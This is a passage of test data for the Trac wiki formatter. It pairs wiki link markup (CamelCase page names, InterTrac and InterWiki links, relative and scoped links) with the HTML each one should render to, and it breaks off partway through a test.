<a class="wiki" href="/wiki/C'est%20l'%C3%A9t%C3%A9">wiki:"C'est l'\xe9t\xe9"</a>
<a class="missing wiki" href="/wiki/MissingPage" rel="nofollow">wiki:MissingPage</a>
<a class="missing wiki" href="/wiki/12" rel="nofollow">wiki:12</a>
<a class="missing wiki" href="/wiki/abc" rel="nofollow">wiki:abc</a>
</p>
------------------------------
============================== wiki: link resolver + query and fragment
wiki:TestPage?format=txt
wiki:TestPage/?version=12
wiki:TestPage/?action=diff&version=12
wiki:"Space 1 23#heading"
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage?format=txt">wiki:TestPage?format=txt</a>
<a class="wiki" href="/wiki/TestPage?version=12">wiki:TestPage/?version=12</a>
<a class="wiki" href="/wiki/TestPage?action=diff&version=12">wiki:TestPage/?action=diff&version=12</a>
<a class="wiki" href="/wiki/Space%201%2023#heading">wiki:"Space 1 23#heading"</a>
</p>
------------------------------
============================== WikiPageNames conformance
CamelCase AlabamA ABc AlaBamA FooBar
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a> AlabamA ABc AlaBamA <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>
</p>
------------------------------
============================== WikiPageNames conformance (unicode)
SmÅogstore should produce a link
and so should wiki:ÜberflüssigkeitsTheorie
------------------------------
<p>
<a class="missing wiki" href="/wiki/Sm%C3%85ogstore" rel="nofollow">SmÅogstore</a> should produce a link
and so should <a class="missing wiki" href="/wiki/%C3%9Cberfl%C3%BCssigkeitsTheorie" rel="nofollow">wiki:ÜberflüssigkeitsTheorie</a>
</p>
------------------------------
============================== More WikiPageNames conformance
CamelCase,CamelCase.CamelCase: CamelCase
But not CamelCase2
nor CamelCase_
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>,<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>.<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>: <a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>
But not CamelCase2
nor CamelCase_
</p>
------------------------------
============================== Escaping WikiPageNames
!CamelCase
------------------------------
<p>
CamelCase
</p>
------------------------------
============================== WikiPageNames endings
foo (FooBar )
foo FooBar: something
foo FooBar.
FooBar, foo
foo FooBar;
foo FooBar!
foo FooBar?
foo (FooBar)
foo {FooBar}
foo 'FooBar'
foo "FooBar"
foo [FooBar]
------------------------------
<p>
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a> )
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>: something
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>.
<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>, foo
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>;
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>!
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>?
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>)
foo {<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>}
foo '<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>'
foo "<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>"
foo [<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>]
</p>
------------------------------
============================== WikiPageNames counter examples
A0B1, ST62T53C6, IR32V1H000
------------------------------
<p>
A0B1, ST62T53C6, IR32V1H000
</p>
------------------------------
============================== WikiPageNames with fragment identifier
SandBox#heading-fixed-id
wiki:TracSubversion#TracandSubversion1.3.1. etc.
TracSubversion#TracandSubversion1.3.1. etc.
------------------------------
<p>
<a class="missing wiki" href="/wiki/SandBox#heading-fixed-id" rel="nofollow">SandBox#heading-fixed-id</a>
</p>
<p>
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">wiki:TracSubversion#TracandSubversion1.3.1</a>. etc.
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">TracSubversion#TracandSubversion1.3.1</a>. etc.
</p>
------------------------------
============================== WikiPageNames with fragment id (performance test)
BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)]
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil) speed]
------------------------------
<p>
<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml</a>(fpxml=nil)
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml</a>(fpxml=nil)]
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml</a>(fpxml=nil) speed]
</p>
------------------------------
============================== WikiPageNames counter examples (paths)
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but ThisIs/SubWiki and now This/Also
and ../Relative/Camel or /Absolute/Camel as well
------------------------------
<p>
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but <a class="missing wiki" href="/wiki/ThisIs/SubWiki" rel="nofollow">ThisIs/SubWiki</a> and now <a class="missing wiki" href="/wiki/This/Also" rel="nofollow">This/Also</a>
and <a class="missing wiki" href="/wiki/Relative/Camel" rel="nofollow">../Relative/Camel</a> or <a class="missing wiki" href="/wiki/Absolute/Camel" rel="nofollow">/Absolute/Camel</a> as well
</p>
------------------------------
============================== WikiPageNames counter examples (numbers)
8FjBpOmy
anotherWikiPageName
------------------------------
<p>
8FjBpOmy
anotherWikiPageName
</p>
------------------------------
8FjBpOmy
anotherWikiPageName
============================== WikiPageNames counter examples (unicode)
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
------------------------------
<p>
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
</p>
------------------------------
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
============================== not a WikiPageNames at all (#9025 regression)
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]------------------------------
<p>
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
</p>
------------------------------
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
============================== MoinMoin style forced links
This is a ["Wiki"] page link.
This is a ["Wiki" wiki page] link with label.
This is a ["Wiki?param=1#fragment"] page link with query and fragment.
------------------------------
<p>
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">Wiki</a> page link.
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">wiki page</a> link with label.
This is a <a class="missing wiki" href="/wiki/Wiki?param=1#fragment" rel="nofollow">Wiki</a> page link with query and fragment.
</p>
------------------------------
============================== Wiki links with @version
wiki:page@12
WikiStart@12
WikiStart@12#heading
[WikiStart@12]
[WikiStart@12#heading]
This is a ["Wiki@12"] page link.
[wiki:WikiStart@12?format=txt v12 as text]
------------------------------
<p>
<a class="missing wiki" href="/wiki/page?version=12" rel="nofollow">wiki:page@12</a>
<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>
<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>
[<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>]
[<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>]
This is a <a class="missing wiki" href="/wiki/Wiki?version=12" rel="nofollow">Wiki@12</a> page link.
<a class="wiki" href="/wiki/WikiStart?version=12&format=txt">v12 as text</a>
</p>
------------------------------
============================== WikiPageName with label
See details of the [WikiPageNames wiki page name] syntax.
Here's a [BadExample\fbad] example with special whitespace.
We can also [WikiLabels '"use [quotes]"']
or [WikiLabels "'use [quotes]'"]
------------------------------
<p>
See details of the <a class="missing wiki" href="/wiki/WikiPageNames" rel="nofollow">wiki page name</a> syntax.
Here's a <a class="missing wiki" href="/wiki/BadExample" rel="nofollow">bad</a> example with special whitespace.
We can also <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">"use [quotes]"</a>
or <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">'use [quotes]'</a>
</p>
------------------------------
============================== WikiPageName with label should be strict...
new_channel_name [, '''integer''' handle [, '''boolean''' test]]
------------------------------
<p>
new_channel_name [, <strong>integer</strong> handle [, <strong>boolean</strong> test]]
</p>
------------------------------
============================== InterTrac for wiki
t:wiki:InterTrac
trac:wiki:InterTrac
TRAC:wiki:InterTrac
[t:wiki:InterTrac intertrac]
[trac:wiki:InterTrac intertrac]
[trac:wiki:JonasBorgström jonas]
[TRAC:wiki:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>t:wiki:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>trac:wiki:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>TRAC:wiki:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AJonasBorgstr%C3%B6m" title="wiki:JonasBorgström in The Trac Project"><span class="icon"></span>jonas</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AJonasBorgstr%C3%B6m" title="wiki:JonasBorgström in The Trac Project"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== Wiki InterTrac shorthands
t:InterTrac
trac:InterTrac
TRAC:InterTrac
[t:InterTrac intertrac]
[trac:InterTrac intertrac]
[trac:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>t:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>trac:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>TRAC:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/JonasBorgstr%C3%B6m" title="JonasBorgström in The Trac Project"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== InterWiki links
This is the original MeatBall:InterMapTxt wiki page.
Checkout the [tsvn:http://svn.edgewall.com/repos/trac Trac Repository].
complex link complex:a:test with positional arguments
complex link complex:a (not enough arguments)
complex link complex:a:test:more (too many arguments)
in trac.ini inter:b:resource
in trac.ini over:c:something overrides wiki
NoLink:ignored
NoLink:
NoLink: ...
------------------------------
<p>
This is the original <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt</a> wiki page.
Checkout the <a class="ext-link" href="tsvn:http://svn.edgewall.com/repos/trac" title="http://svn.edgewall.com/repos/trac in tsvn"><span class="icon"></span>Trac Repository</a>.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt" title="resource test in a"><span class="icon"></span>complex:a:test</a> with positional arguments
complex link <a class="ext-link" href="http://server/a/page/?format=txt" title="resource in a"><span class="icon"></span>complex:a</a> (not enough arguments)
complex link <a class="ext-link" href="http://server/a/page/test:more?format=txt" title="resource test:more in a"><span class="icon"></span>complex:a:test:more</a> (too many arguments)
</p>
<p>
in trac.ini <a class="ext-link" href="http://inter/b/page/resource" title="Resource resource in b"><span class="icon"></span>inter:b:resource</a>
in trac.ini <a class="ext-link" href="http://over/c/page/something" title="c:something in over"><span class="icon"></span>over:c:something</a> overrides wiki
</p>
<p>
NoLink:ignored
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink</a>:
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink</a>: ...
</p>
------------------------------
============================== InterWiki links with parameters and fragment
See also MeatBall:InterMapTxt#there wiki page
and MeatBall:InterMapTxt?format=txt#there wiki page.
complex link complex:a:test?go#there with positional arguments
------------------------------
<p>
See also <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt#there</a> wiki page
and <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt&format=txt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt?format=txt#there</a> wiki page.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt&go#there" title="resource test in a"><span class="icon"></span>complex:a:test?go#there</a> with positional arguments
</p>
------------------------------
============================== Regression for #9712
This is not a link: x,://localhost
------------------------------
<p>
This is not a link: x,:<em>localhost
</em></p>
------------------------------
============================== Wiki links with @version using unicode digits
WikiStart@₄₂
WikiStart@₄₂#heading
[WikiStart@₄₂]
[WikiStart@₄₂#heading]
------------------------------
<p>
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂]
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading]
</p>
------------------------------
""" #" Emacs likes it that way better
RELATIVE_LINKS_TESTS = u"""
============================== Relative to the project url
[//docs Documentation]
[//docs?param=1#fragment Documentation]
[//docs]
[//docs //docs]
[//docs?param=1#fragment]
[// Home]
[//]
[//?param=1#fragment]
------------------------------
<p>
<a href="/docs">Documentation</a>
<a href="/docs?param=1#fragment">Documentation</a>
<a href="/docs">docs</a>
<a href="/docs">//docs</a>
<a href="/docs?param=1#fragment">docs</a>
<a href="/">Home</a>
<a href="/">//</a>
<a href="/?param=1#fragment">//</a>
</p>
------------------------------
============================== Relative to the base url
[/newticket?priority=high#fragment bug]
[/newticket?priority=high#fragment]
[/newticket]
[/newticket /newticket]
[/ Project]
[/]
[/?param=1#fragment]
------------------------------
<p>
<a href="/newticket?priority=high#fragment">bug</a>
<a href="/newticket?priority=high#fragment">newticket</a>
<a href="/newticket">newticket</a>
<a href="/newticket">/newticket</a>
<a href="/">Project</a>
<a href="/">/</a>
<a href="/?param=1#fragment">/</a>
</p>
------------------------------
============================== Relative to the current page
[.]
[./]
[..]
[../]
[./../.]
[. this page]
[./Detail see detail]
[./Detail]
[./Detail ./Detail]
[.. see parent]
[../Other see other]
[../Other]
[../Other ../Other]
[.././../Other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub">./</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">../</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">./../.</a>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">../Other</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other</a>
</p>
------------------------------
============================== Relative to the current page, in wiki realm
[wiki:. this page]
[wiki:./Detail]
[wiki:"./Detail"]
[wiki:./Detail ./Detail]
[wiki:./Detail see detail]
[wiki:.. see parent]
[wiki:../Other see other]
[wiki:.././../Other]
["."]
[".?param=1#fragment"]
["./Detail"]
["./Detail?param=1#fragment"]
[".."]
["..?param=1#fragment"]
["../Other"]
["../Other?param=1#fragment"]
[".././../Other"]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other</a>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#fragment">.</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#fragment" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..</a>
<a class="missing wiki" href="/wiki/Main?param=1#fragment" rel="nofollow">..</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#fragment" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other</a>
</p>
------------------------------
============================== Relative to the current page, as CamelCase
OnePage/SubPage
./SubPage
../SiblingPage
.././../HigherPage
/TopPage
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/OnePage/SubPage" rel="nofollow">OnePage/SubPage</a>
<a class="missing wiki" href="/wiki/Main/Sub/SubPage" rel="nofollow">./SubPage</a>
<a class="missing wiki" href="/wiki/Main/SiblingPage" rel="nofollow">../SiblingPage</a>
<a class="missing wiki" href="/wiki/HigherPage" rel="nofollow">.././../HigherPage</a>
<a class="missing wiki" href="/wiki/TopPage" rel="nofollow">/TopPage</a>
</p>
------------------------------
============================== Relative to the current page with query strings and fragments
[#topic see topic]
[?param=1#topic see topic]
[.#topic see topic]
[.?param=1#topic see topic]
[./#topic see topic]
[./?param=1#topic see topic]
[./Detail#topic see detail]
[./Detail?param=1#topic see detail]
[./Detail?param=1#topic]
[..#topic see parent]
[..?param=1#topic see parent]
[../#topic see parent]
[../?param=1#topic see parent]
[../Other#topic see other]
[../Other?param=1#topic see other]
[../Other?param=1#topic]
[../Other/#topic see other]
[../Other/?param=1#topic see other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail#topic" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other</a>
</p>
------------------------------
""" # "
SPLIT_PAGE_NAMES_TESTS = u"""
============================== Splitting relative links
[//WikiPage]
[/WikiPage]
[./WikiPage]
[../WikiPage]
[//WikiPage?param=1#fragment]
[/WikiPage?param=1#fragment]
[./WikiPage?param=1#fragment]
[../WikiPage?param=1#fragment]
But not [./wiki_page]
And not [../WikiPage WikiPage]
------------------------------
<p>
<a href="/WikiPage">Wiki Page</a>
<a href="/WikiPage">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage</a>
</p>
------------------------------
============================== Splitting scoped links
[wiki:WikiPage]
[wiki:./WikiPage]
[wiki:../WikiPage]
[wiki:./.././WikiPage]
[wiki:"./.././WikiPage"]
[wiki:WikiPage?param=1#fragment]
[wiki:./WikiPage?param=1#fragment]
[wiki:../WikiPage?param=1#fragment]
But not [wiki:./wiki_page]
And not [wiki:../WikiPage WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage</a>
</p>
------------------------------
============================== Splitting internal free links
["WikiPage"]
["./WikiPage"]
["../WikiPage"]
["./.././WikiPage"]
["WikiPage?param=1#fragment"]
["./WikiPage?param=1#fragment"]
["../WikiPage?param=1#fragment"]
But not ["./wiki_page"]
And not ["../WikiPage" WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage</a>
</p>
------------------------------
""" # "
SCOPED_LINKS_TESTS = u"""
============================== Scoped links for hierarchical pages
ThirdLevel
[wiki:ThirdLevel]
OtherThirdLevel
[wiki:OtherThirdLevel]
SecondLevel/OtherThirdLevel
[wiki:SecondLevel/OtherThirdLevel]
SecondLevel
[wiki:SecondLevel]
FirstLevel
[wiki:FirstLevel]
TestPage
[wiki:TestPage]
MissingPage
[wiki:MissingPage]
FirstLevel/MissingPage
[wiki:FirstLevel/MissingPage]
SecondLevel/MissingPage
[wiki:SecondLevel/MissingPage]
MissingFirstLevel/MissingPage
[wiki:MissingFirstLevel/MissingPage]
["/OtherThirdLevel"]
[wiki:/OtherThirdLevel]
[wiki:/OtherThirdLevel /OtherThirdLevel]
------------------------------
<p>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage</a>
